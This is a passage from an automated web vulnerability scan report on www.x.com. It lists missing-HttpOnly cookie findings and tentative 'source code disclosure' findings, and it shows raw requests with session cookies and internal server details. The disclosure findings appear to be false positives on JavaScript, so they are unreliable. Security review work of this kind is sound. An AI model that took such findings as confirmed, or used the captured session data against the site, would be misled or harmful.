User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.206. https://www.x.com/people/gem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.207. https://www.x.com/people/gogoeric  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.208. https://www.x.com/people/hotellina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.209. https://www.x.com/people/iConcessionStand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.210. https://www.x.com/people/joncas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.211. https://www.x.com/people/lwhite2104  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.212. https://www.x.com/people/mandeheritage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133393730313b332c3133343430323b332c3134303635343b332c39313330313b332c3132323335343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.213. https://www.x.com/people/odeskdev  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.214. https://www.x.com/people/omuleanu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.215. https://www.x.com/people/pluto26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.216. https://www.x.com/people/posiden5665  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3134303635343b332c3133343430323b332c34383739343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.217. https://www.x.com/people/ramonmorales123  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132323335343b332c3133343430323b332c34383739343b332c3134303635343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.218. https://www.x.com/people/rizkygarut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133363935343b332c35333735313b332c3133383538323b332c36303039313b332c3133373131353b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.219. https://www.x.com/people/roguereptile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.221. https://www.x.com/people/sebastian.kopp@wooga.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.222. https://www.x.com/people/skier  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31323739393b332c3133313833303b332c3133363236393b332c3132393239303b332c3133373135383b332c3133373331333b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

5. Source code disclosure  previous  next
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


5.1. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=354 t=1313114380766811
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.2. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654809
JP: D=647 t=1313156390522448
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.3. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js  previous  next

Summary

Severity:   Low
